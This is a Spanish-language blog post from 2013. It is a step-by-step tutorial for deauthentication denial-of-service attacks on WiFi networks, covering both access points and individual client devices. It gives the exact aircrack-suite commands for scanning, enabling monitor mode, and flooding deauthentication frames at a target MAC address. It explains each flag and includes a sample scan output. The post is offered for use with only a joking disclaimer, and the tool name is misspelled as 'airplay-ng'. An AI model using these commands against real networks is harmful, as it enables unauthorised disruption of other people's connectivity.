lunes, 27 de mayo de 2013
Denegando los servicios en las Redes WIFI
Hoy es Lunes y me toca explicar algo sobre hacking, asi que manos a la obra, siguiendo con el hilo de las denegaciones de servicio, hoy les tengo, como denegar servicios en redes wifi tanto al AP (Access Point) como algun cliente de la red.
ok, antes de empezar, como siempre digo, no me hago responsable de lo que sea aprendido en esta entrada, asi que dejare nuevamente el mensaje.
Advertencia: el autor de este documento no se hace responsable de lo que el lector haga con el material, toda responsabilidad caera en manos del perpretador.
una vez que hayan entendido de que no me hago responsable si los encarcelan, continuemos.
para realizar una denegacion de servicio en redes wifi es algo sencillo solo necesitamos una tarjeta wifi con modo promiscuo o modo monitor como le quieran decir y una distribucion de gnu/linux para realizar esta proeza
ok ya sabiendo que necesitamos todo esto, en dado caso de que no tengas una tarjeta en modo monitor, puedes comprarte una en mercadolibre :P claro si es que te interesa.
D.O.S. al Punto de Acceso
afirmo que no necesitamos estar en a red del AP para poder realizar este ataque, ok empezemos.
para iniciar necesitamos saber en que canal esta funcionando el AP que Dosearemos, asi que usaremos este comando:
(jopc)#iwlist wlan0 scan
el anterior comando nos mostrara una lista con todas las redes wifi encontradas por nuestra tarjeta inalambrica, entre todo ese texto escogeremos una red que nos guste y copiaremos el numero de canal como en el ejemplo de abajo.
Ejemplo:
(jopc)#iwlist wlan0 scan
Cell 01 - Address: E0:1D:3B:54:CA:F0
Channel:4
Frequency:2.427 GHz (Channel 4)
Quality=25/70 Signal level=-85 dBm
Encryption key:on
ESSID:"XXXXX"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=00000003e4e3546f
Extra: Last beacon: 4ms ago
IE: Unknown: 000D494E46494E4954554D43373930
IE: Unknown: 010882848B960C121824
IE: Unknown: 030104
IE: Unknown: 0706555320010B1B
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101870003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C33CC111BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1ACC111BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C3404080800000000000000000000000000000000000000
IE: Unknown: 3D1604080800000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
IE: Unknown: DD860050F204104A0001101044000102103B0001031047001000000000000010000000E01D3B54CAF0102100034349471023000F4349472047504F4E204F4E542052471024000B43494730303030303030311042000831323334353637381054000800060050F20400011011000F4349472047504F4E204F4E54205247100800020082103C000103
como pudimos observar la red XXXXX, esta trabajando en el canal 4 y su direccion mac es E0:1D:3B:54:CA:F0 esta es toda la informacion que necesitamos para realizar una D.O.S. en la red wifi
ahora pocederemos a activar el modo monitor de nuestra tarjeta
(jopc)# airmon-ng start wlan0
esto nos creara una nueva interfaz de red llamada mon0 que sera la que utilizaremos para hacer la Denegacion.
ahora colocaremos nuestra tarjeta a monitorear la red XXXXX
(jopc)# airodump-ng -c 4 mon0
-c parametro de airodump-ng para definir el canal de la victima
mon0 la interfaz en modo monitor
una vez que esta monitoreando la red es hora de lanzar el ataque, asi que abrimos otra terminal y tecleamos lo siguiente.
(jopc)# airplay-ng -0 0 -a E0:1D:3B:54:CA:F0 mon0
-0 parametro que indica ataque de desautenticacion
0 tiempo de espera entre cada envio de desautenticacion
-a direccion mac del Punto de acceso (AP).
mon0 interfaz de red
D.O.S. a clientes conectados al AP
este metodo es sencillo, solo explicare el comando final por que no viene al caso explicar mas ya que el proceso es igual a este.
Ejemplo:
(jopc)# airplay-ng -0 0 -a E0:1D:3B:54:CA:F0 -c 00:11:22:33:44:55 mon0
-c parametro que indica la direccion mac de el cliente victima
00:11:22:33:44:55 direccion mac del cliente victima
bueno eso es todo por hoy un pequeño manual de como realizar denegacion de servicio en redes wifi, las direcciones mac de los clientes de la red lo pueden ver con el comando anteriormente mensiondo "airodump-ng -c 4 mon0"
ahi aparecen las direcciones mac de los equipos asociados a la red.
y de nuevo me despido y espero no hagan travesuras con esto :P
Saludos.
Suscribirse a:
Enviar comentarios (Atom)
Excelente!!! :)
ResponderEliminar